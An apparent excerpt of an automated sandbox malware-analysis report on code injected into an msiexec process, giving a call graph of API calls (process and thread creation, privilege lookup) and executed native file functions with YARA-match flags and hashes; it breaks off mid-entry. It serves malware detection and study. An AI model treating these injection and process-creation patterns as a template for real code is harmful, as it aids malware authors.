LdrLoadDll 32808->32809 32810 e8aeba 32809->32810 32811 e8abe0 LdrLoadDll 32810->32811 32812 e8aec3 32811->32812 32813 e8abe0 LdrLoadDll 32812->32813 32814 e8aecc 32813->32814 32814->32590 32816 e8af60 LdrLoadDll 32815->32816 32817 e89e8c 32816->32817 32845 4dc9860 LdrInitializeThunk 32817->32845 32818 e89ea3 32818->32511 32820->32588 32822 e8af60 LdrLoadDll 32821->32822 32823 e8a50c 32822->32823 32823->32580 32825 e8d0a0 32824->32825 32826 e8d0a6 32824->32826 32825->32698 32827 e8c0b0 LdrLoadDll 32826->32827 32828 e8d0cc 32827->32828 32828->32698 32830 e84f84 32829->32830 32831 e8bee0 2 API calls 32829->32831 32830->32717 32831->32830 32832->32703 32834 e8d130 32833->32834 32835 e8c0b0 LdrLoadDll 32834->32835 32838 e8d18d 32834->32838 32836 e8d16a 32835->32836 32837 e8bee0 2 API calls 32836->32837 32837->32838 32838->32703 32840 e8abfb 32839->32840 32841 e85aa0 LdrLoadDll 32840->32841 32842 e8ac1b 32841->32842 32843 e85aa0 LdrLoadDll 32842->32843 32844 e8accf 32842->32844 32843->32844 32844->32740 32845->32818 32847 4dc968f LdrInitializeThunk 32846->32847 32848 4dc9681 32846->32848 32847->32596 32848->32596 32850 e8af60 LdrLoadDll 32849->32850 32851 e8a63c RtlFreeHeap 32850->32851 32851->32600 32853 e77220 32852->32853 32854 e7721b 32852->32854 32855 e8be60 LdrLoadDll 32853->32855 32854->32519 32862 e77245 32855->32862 32856 e772a8 32856->32519 32857 e89e70 2 API calls 32857->32862 32858 e772ae 32859 e772d4 32858->32859 32861 e8a570 2 API calls 32858->32861 32859->32519 32864 e772c5 32861->32864 32862->32856 32862->32857 32862->32858 32863 e8be60 LdrLoadDll 32862->32863 32868 e8a570 32862->32868 32863->32862 32864->32519 32866 e774ee 32865->32866 32867 e8a570 2 API calls 32865->32867 32866->32480 32867->32866 32869 e8a58c 32868->32869 32870 e8af60 LdrLoadDll 32868->32870 32873 4dc96e0 LdrInitializeThunk 32869->32873 32870->32869 32871 e8a5a3 32871->32862 32873->32871 32875 e8b623 32874->32875 32878 e7a140 32875->32878 32879 e7a164 32878->32879 32880 e7906a 32879->32880 32881 e7a1a0 LdrLoadDll 32879->32881 32880->32486 32881->32880 32883 e7a4b3 32882->32883 32885 e7a530 32883->32885 32897 e89c40 LdrLoadDll 32883->32897 32885->32493 32887 e8af60 LdrLoadDll 32886->32887 32888 e7d5ab 32887->32888 32888->32496 32889 e8a780 32888->32889 32890 e8af60 LdrLoadDll 32889->32890 32891 e8a79f LookupPrivilegeValueW 32890->32891 32891->32498 32893 e8a22c 32892->32893 32894 e8af60 LdrLoadDll 32892->32894 32898 4dc9910 LdrInitializeThunk 32893->32898 32894->32893 32895 e8a24b 32895->32499 32897->32885 32898->32895 32900 e7a637 32899->32900 32901 e7a490 LdrLoadDll 32900->32901 32902 e7a666 32901->32902 32902->32439 32904 e7a384 32903->32904 32959 e89c40 LdrLoadDll 32904->32959 32906 e7a3be 32906->32441 32908 e7d79c 32907->32908 32909 e7a610 LdrLoadDll 32908->32909 32910 e7d7ae 32909->32910 32960 e7d680 32910->32960 32913 e7d7e1 32915 e7d7f2 32913->32915 32918 e8a440 2 API calls 32913->32918 32914 e7d7c9 32916 e7d7d4 32914->32916 32917 e8a440 2 API calls 32914->32917 32915->32445 32916->32445 32917->32916 32918->32915 32920 e7b4e6 32919->32920 32921 e7b4f0 32919->32921 32920->32453 32922 e7a490 LdrLoadDll 32921->32922 32923 e7b561 32922->32923 32924 e7a360 LdrLoadDll 32923->32924 32925 e7b575 32924->32925 32926 e7b598 32925->32926 32927 e7a490 LdrLoadDll 32925->32927 32926->32453 32928 e7b5b4 32927->32928 32929 e856a0 7 API calls 32928->32929 32930 e7b609 32929->32930 32930->32453 32932 e7c066 32931->32932 32933 e7a490 LdrLoadDll 32932->32933 32934 e7c07a 32933->32934 32980 e7bd30 32934->32980 32936 e7858c 32957 e7b620 LdrLoadDll 32936->32957 33009 e7da30 32937->33009 32939 e78431 32939->32465 32940 e78233 32940->32939 33015 e84ff0 32940->33015 32942 e78292 32942->32939 33018 e77fd0 32942->33018 32945 e8d090 LdrLoadDll 32946 e782d9 32945->32946 32947 e8d1c0 2 API calls 32946->32947 32949 e782ee 32947->32949 32948 e77210 3 API calls 32954 e78340 32948->32954 32949->32954 33077 e73660 9 API calls 32949->33077 32954->32939 32954->32948 32955 e774d0 2 API calls 32954->32955 33023 e7b200 32954->33023 33073 e7d9d0 32954->33073 33078 e7d4b0 18 API calls 32954->33078 32955->32954 32956->32442 32957->32458 32958->32463 32959->32906 32961 e7d69a 32960->32961 32969 e7d750 32960->32969 32962 e7a490 LdrLoadDll 32961->32962 32963 e7d6bc 32962->32963 32970 e89ef0 32963->32970 32965 e7d6fe 32974 e89f30 32965->32974 32968 e8a440 2 API calls 32968->32969 32969->32913 32969->32914 32971 e89ef3 32970->32971 32972 e8af60 LdrLoadDll 32971->32972 32973 e89f0c 32972->32973 32973->32965 32975 e89f4c 32974->32975 32976 e8af60 LdrLoadDll 32974->32976 32979 4dc9fe0 LdrInitializeThunk 32975->32979 32976->32975 32977 e7d744 32977->32968 32979->32977 32981 e7bd47 32980->32981 32989 e7da70 32981->32989 32985 e7bdbb 32986 e7bdc2 32985->32986 33000 e8a250 LdrLoadDll 32985->33000 32986->32936 32988 e7bdd5 32988->32936 32990 e7da95 32989->32990 33001 e77510 32990->33001 32992 e7bd8f 32997 e8a690 32992->32997 32993 e856a0 7 API calls 32995 e7dab9 32993->32995 32995->32992 32995->32993 32996 e8bee0 2 API calls 32995->32996 33008 e7d8b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32995->33008 32996->32995 32998 e8af60 LdrLoadDll 32997->32998 32999 e8a6af CreateProcessInternalW 32998->32999 32999->32985 33000->32988 33002 e7760f 33001->33002 33003 e77525 33001->33003 33002->32995 33003->33002 33004 e856a0 7 API calls 33003->33004 33005 e77592 33004->33005 33006 e8bee0 2 API calls 33005->33006 33007 e775b9 33005->33007 33006->33007 33007->32995 33008->32995 33010 e7da3c 33009->33010 33011 e85aa0 LdrLoadDll 33010->33011 33012 e7da4f 33011->33012 33013 e7da56 SetErrorMode 33012->33013 33014 e7da5d 33012->33014 33013->33014 33014->32940 33079 e7d800 33015->33079 33017 e85016 33017->32942 33019 e8be60 LdrLoadDll 33018->33019 33022 e77ff5 33019->33022 33020 e78210 33020->32945 33022->33020 33099 e89830 33022->33099 33024 e7b21f 33023->33024 33025 e7b219 33023->33025 33156 e78c20 33024->33156 33147 e7d2c0 33025->33147 33028 e7b22c 33029 e7b4c2 33028->33029 33030 e8d1c0 2 API calls 33028->33030 33029->32954 33031 e7b248 33030->33031 33032 e7b25c 33031->33032 33033 e7d9d0 2 API calls 33031->33033 33165 e89cc0 33032->33165 33033->33032 33036 e7b390 33181 e7b1a0 LdrLoadDll LdrInitializeThunk 33036->33181 33037 e89eb0 2 API calls 33038 e7b2da 33037->33038 33038->33036 33042 e7b2e6 33038->33042 33040 e7b3af 33041 e7b3b7 33040->33041 33182 e7b110 LdrLoadDll NtClose LdrInitializeThunk 33040->33182 33043 e8a440 2 API calls 33041->33043 33042->33029 33045 e7b339 33042->33045 33048 e89fc0 2 API calls 33042->33048 33046 e7b3c1 33043->33046 33049 e8a440 2 API calls 33045->33049 33046->32954 33047 e7b3d9 33047->33041 33050 e7b3e0 33047->33050 33048->33045 33051 e7b356 33049->33051 33052 e7b3f8 33050->33052 33183 e7b090 LdrLoadDll LdrInitializeThunk 33050->33183 33168 e892e0 33051->33168 33184 e89d40 LdrLoadDll 33052->33184 33056 e7b40c 33185 e7af10 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33056->33185 33057 e7b36d 33057->33029 33171 e77680 33057->33171 33059 e7b430 33061 e7b47d 33059->33061 33186 e89d70 LdrLoadDll 33059->33186 33188 e89dd0 LdrLoadDll 33061->33188 33065 e7b44e 33065->33061 33187 e89e00 LdrLoadDll 33065->33187 33066 e7b48b 33067 e8a440 2 API calls 33066->33067 33068 e7b495 33067->33068 33069 e8a440 2 API calls 33068->33069 33071 e7b49f 33069->33071 33071->33029 33072 e77680 3 API calls 33071->33072 33072->33029 33074 e7d9e3 33073->33074 33259 e89e40 33074->33259 33077->32954 33078->32954 33080 e7d81d 33079->33080 33086 e89f70 33080->33086 33083 e7d865 33083->33017 33087 e8af60 LdrLoadDll 33086->33087 33088 e89f8c 33087->33088 33097 4dc99a0 LdrInitializeThunk 33088->33097 33089 e7d85e 33089->33083 33091 e89fc0 33089->33091 33092 e89fc3 33091->33092 33093 e8af60 LdrLoadDll 33092->33093 33094 e89fdc 33093->33094 33098 4dc9780 LdrInitializeThunk 33094->33098 33095 e7d88e 33095->33017 33097->33089 33098->33095 33100 e8c0b0 LdrLoadDll 33099->33100 33101 e89847 33100->33101 33120 e78760 33101->33120 33103 e89862 33104 e89889 33103->33104 33105 e898a0 33103->33105 33106 e8bee0 2 API calls 33104->33106 33107 e8be60 LdrLoadDll 33105->33107 33108 e89896 33106->33108 33109 e898da 33107->33109 33108->33020 33110 e8be60 LdrLoadDll 33109->33110 33111 e898f3 33110->33111 33117 e89b94 33111->33117 33126 e8bea0 LdrLoadDll 33111->33126 33113 e89b79 33114 e89b80 33113->33114 33113->33117 33115 e8bee0 2 API calls 33114->33115 33116 e89b8a 33115->33116 33116->33020 33118 e8bee0 2 API calls 33117->33118 33119 e89be9 33118->33119 33119->33020 33121 e78785 33120->33121 33122 e7a140 LdrLoadDll 33121->33122 33123 e787b8 33122->33123 33125 e787dd 33123->33125 33127 e7b940 33123->33127 33125->33103 33126->33113 33128 e7b96c 33127->33128 33129 e8a190 LdrLoadDll 33128->33129 33130 e7b985 33129->33130 33131 e7b98c 33130->33131 33138 e8a1d0 33130->33138 33131->33125 33135 e7b9c7 33136 e8a440 2 API calls 33135->33136 33137 e7b9ea 33136->33137 33137->33125 33139 e8af60 LdrLoadDll 33138->33139 33140 e8a1ec 33139->33140 33146 4dc9710 LdrInitializeThunk 33140->33146 33141 e7b9af 33141->33131 33143 e8a7c0 33141->33143 33144 e8af60 LdrLoadDll 33143->33144 33145 e8a7df 33144->33145 33145->33135 33146->33141 33189 e7c3b0 33147->33189 33149 e7d2d7 33155 e7d2f0 33149->33155 33202 e74000 33149->33202 33150 e8c0b0 LdrLoadDll 33152 e7d2fe 33150->33152 33152->33024 33153 e7d2ea 33229 e89160 33153->33229 33155->33150 33157 e78c29 33156->33157 33158 e7d680 3 API calls 33157->33158 33164 e78d5b 33157->33164 33159 e78d3c 33158->33159 33160 e78d6a 33159->33160 33161 e78d51 33159->33161 33162 e8a440 2 API calls 33159->33162 33160->33028 33258 e76290 LdrLoadDll 33161->33258 33162->33161 33164->33028 33166 e8af60 LdrLoadDll 33165->33166 33167 e7b2b0 33166->33167 33167->33029 33167->33036 33167->33037 33169 e7d9d0 2 API calls 33168->33169 33170 e89312 33169->33170 33170->33057 33172 e77698 33171->33172 33173 e7a140 LdrLoadDll 33172->33173 33174 e776b3 33173->33174 33175 e85aa0 LdrLoadDll 33174->33175 33176 e776c3 33175->33176 33177 e776fd 33176->33177 33178 e776cc PostThreadMessageW 33176->33178 33177->32954 33178->33177 33179 e776e0 33178->33179 33180 e776ea PostThreadMessageW 33179->33180 33180->33177 33181->33040 33182->33047 33183->33052 33184->33056 33185->33059 33186->33065 33187->33061 33188->33066 33190 e7c3e3 33189->33190 33234 e7a750 33190->33234 33192 e7c3f5 33238 e7a8c0 33192->33238 33194 e7c413 33195 e7a8c0 LdrLoadDll 33194->33195 33196 e7c429 33195->33196 33197 e7d800 3 API calls 33196->33197 33198 e7c44d 33197->33198 33199 e7c454 33198->33199 33241 e8c0f0 LdrLoadDll 33198->33241 33199->33149 33201 e7c464 33201->33149 33203 e7402c 33202->33203 33204 e7b940 3 API calls 33203->33204 33206 e74103 33204->33206 33205 e74695 33205->33153 33206->33205 33242 e8c130 33206->33242 33208 e7416e 33209 e7a490 LdrLoadDll 33208->33209 33210 e742f4 33209->33210 33211 e7a490 LdrLoadDll 33210->33211 33212 e74318 33211->33212 33246 e7ba00 33212->33246 33216 e743b3 33217 e74479 33216->33217 33218 e7ba00 2 API calls 33216->33218 33220 e8be60 LdrLoadDll 33217->33220 33219 e74452 33218->33219 33219->33217 33251 e8a0d0 LdrLoadDll 33219->33251 33221 e744e6 33220->33221 33223 e8be60 LdrLoadDll 33221->33223 33224 e744ff 33223->33224 33224->33205 33225 e7a490 LdrLoadDll 33224->33225 33226 e74547 33225->33226 33227 e7a360 LdrLoadDll 33226->33227 33228 e745f9 33227->33228 33228->33153 33230 e85aa0 LdrLoadDll 33229->33230 33231 e89181 33230->33231 33232 e891a7 33231->33232 33233 e89194 CreateThread 33231->33233 33232->33155 33233->33155 33235 e7a75a 33234->33235 33236 e7a490 LdrLoadDll 33235->33236 33237 e7a7b3 33236->33237 33237->33192 33239 e7a490 LdrLoadDll 33238->33239 33240 e7a8d9 33239->33240 33240->33194 33241->33201 33243 e8c13d 33242->33243 33244 e85aa0 LdrLoadDll 33243->33244 33245 e8c150 33244->33245 33245->33208 33247 e7ba25 33246->33247 33252 e8a040 33247->33252 33250 e8a0d0 LdrLoadDll 33250->33216 33251->33217 33253 e8af60 LdrLoadDll 33252->33253 33254 e8a05c 33253->33254 33257 4dc96d0 LdrInitializeThunk 33254->33257 33255 e7438c 33255->33216 33255->33250 33257->33255 33258->33164 33260 e8af60 LdrLoadDll 33259->33260 33261 e89e5c 33260->33261 33264 4dc9840 LdrInitializeThunk 33261->33264 33262 e7da0e 33262->32954 33264->33262 33265 e89030 33266 e8be60 LdrLoadDll 33265->33266 33268 e8906b 33265->33268 33266->33268 33267 e8914c 33268->33267 33269 e7a140 LdrLoadDll 33268->33269 33270 e890a1 33269->33270 33271 e85aa0 LdrLoadDll 33270->33271 33273 e890bd 33271->33273 33272 e890d0 Sleep 33272->33273 33273->33267 33273->33272 33276 e88c60 LdrLoadDll 33273->33276 33277 e88e60 LdrLoadDll 33273->33277 33276->33273 33277->33273 33280 4dc9540 LdrInitializeThunk 33281 e89154 33282 e89117 33281->33282 33283 e89157 33281->33283 33287 e890e3 33282->33287 33292 e88e60 LdrLoadDll 33282->33292 33285 e8914c 33286 e890d0 Sleep 33286->33287 33287->33285 33287->33286 33290 e88c60 LdrLoadDll 33287->33290 33291 e88e60 LdrLoadDll 33287->33291 33290->33287 33291->33287 33292->33287

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 00E8A30A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 581 e8a30a-e8a361 call e8af60 NtCreateFile
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,00E85807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00E85807,00000000,00000005,00000060,00000000,00000000), ref: 00E8A35D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 1c35d9b50a4693fd40597984f73b4e81a36507fc3a72e281d033790675647e5c
                                                                                                                                                                                                        • Instruction ID: 0faab2c86fa3ceaa6722dcea38a8784913b87ad2aea1ad871582b798b89635c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c35d9b50a4693fd40597984f73b4e81a36507fc3a72e281d033790675647e5c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D601B2B2200108BFCB18DF88DC85EEB37E9EF8C754F158608FA0DA7241C630E8518BA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 584 e8a310-e8a326 585 e8a32c-e8a361 NtCreateFile 584->585 586 e8a327 call e8af60 584->586 586->585
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,00E85807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00E85807,00000000,00000005,00000060,00000000,00000000), ref: 00E8A35D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                                                                                                                                                                        • Instruction ID: 5533379bcc6591fe9b16e34742d7fa81412860a0e024a4f6d1320457784d64b6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47F0B2B2200208AFCB08DF88DC85EDB37EDAF8C754F118208BA0D97241C630F8518BA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 594 e8a3c0-e8a409 call e8af60 NtReadFile
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtReadFile.NTDLL(00E859C2,5D9515B3,FFFFFFFF,00E85681,00000206,?,00E859C2,00000206,00E85681,FFFFFFFF,5D9515B3,00E859C2,00000206,00000000), ref: 00E8A405
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                        • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                                                                                                                                                                        • Instruction ID: 717f96e5d026de7ce67b7a11d826fbb0e77f367b0fd2a38427e175b588987203
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70F0A4B2200208ABDB14DF99DC85EEB77ADEF8C754F158259BA0DA7241D630E811CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A43A Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(00E859A0,00000206,?,00E859A0,00000005,FFFFFFFF), ref: 00E8A465
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: 99b42772a856820af15d29397048c67f9490cb00a47ebdc95a3a8515fbdd6e86
                                                                                                                                                                                                        • Instruction ID: 15e76095011d0246b07941e8bb2f923f8fbb7ca16ecb9dfb8425bfd771de7528
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99b42772a856820af15d29397048c67f9490cb00a47ebdc95a3a8515fbdd6e86
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1E0C2722002146FE710EFD4DCCAED77BA8DF45720F208066FA5D5B242C530E60087E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A3BB Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,00E85807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00E85807,00000000,00000005,00000060,00000000,00000000), ref: 00E8A35D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: ee4a70274ca1f02bfa6b4e40ce270a313fdac76c5e9c770cb2dfe28eee832430
                                                                                                                                                                                                        • Instruction ID: 0e5ca3f99f0c87e62172b6454cea33d8de7250163a3e58f820681d86d1bed869
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee4a70274ca1f02bfa6b4e40ce270a313fdac76c5e9c770cb2dfe28eee832430
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51D017B6208109AF9B08CF98E885CAB73ACEB88700700450DB98D83140C630A8218BA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(00E859A0,00000206,?,00E859A0,00000005,FFFFFFFF), ref: 00E8A465
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                        • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                                                                                                                                                                        • Instruction ID: 7ad7cdccba295fe6d12953ffa649dc61a57e8a4ddd14a669811604bd965884e5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6D01772200218ABE620EB98DC89E977BACDF48A60F118065BA4C6B242C530FA0087E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 74f3cd559d9e348495a0492bc6c07b83613718cbd1a2c940e7b46f0303098133
                                                                                                                                                                                                        • Instruction ID: b5dc39539c7a1e0a928a1fe9196ee754ff51b4652e32bb25225167d536ad6205
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74f3cd559d9e348495a0492bc6c07b83613718cbd1a2c940e7b46f0303098133
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B09002A1242000076505719D4414616401B97E4245F51C021E10055A0DC565D8D17165
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: d85f2744397a440df4d424ce8090ac92f3b665675c4e81ac7a3e759696da7b05
                                                                                                                                                                                                        • Instruction ID: ea0c235a2891a7ea445cbc9fd8b0de279a9ab13dcd443f51125ff1f1163174a6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d85f2744397a440df4d424ce8090ac92f3b665675c4e81ac7a3e759696da7b05
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB900265251000072505A59D0704507005797D9395751C021F1006560CD661D8A16161
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 3b969c0c0fcd23f99e417bc754e6969177acc3b61c0477ea5afcc0c5441a1a01
                                                                                                                                                                                                        • Instruction ID: e1c12f24b3e8373cee62db851252fad2f6d8b02e266ba8339f6de317581af8a0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b969c0c0fcd23f99e417bc754e6969177acc3b61c0477ea5afcc0c5441a1a01
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1890027124100846F500619D4404B46001697E4345F51C016A0115664D8655D8917561
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
